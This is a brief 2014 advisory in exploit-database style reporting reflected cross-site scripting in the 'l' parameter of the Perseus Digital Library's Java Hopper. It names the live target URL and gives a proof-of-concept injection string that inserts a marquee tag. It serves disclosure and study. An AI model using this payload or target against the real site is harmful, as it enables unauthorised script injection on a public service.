# Cross Site Scripting on Perseus' Java Hopper 
# Risk: Low
# CWE number: CWE-79
# Date: 19/05/2014
# Project: perseus.tufts.edu
# Download: sourceforge.net/projects/perseus-hopper
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: morph?l=
# Exploit: http://host/hopper/morph?l=[xss]
# PoC:

[-]Target: http://www.perseus.tufts.edu

[-]Vuln. File: /hopper/morph?l=

[-]Exploit: "><marquee>Vulnerable</marquee>

# Thank's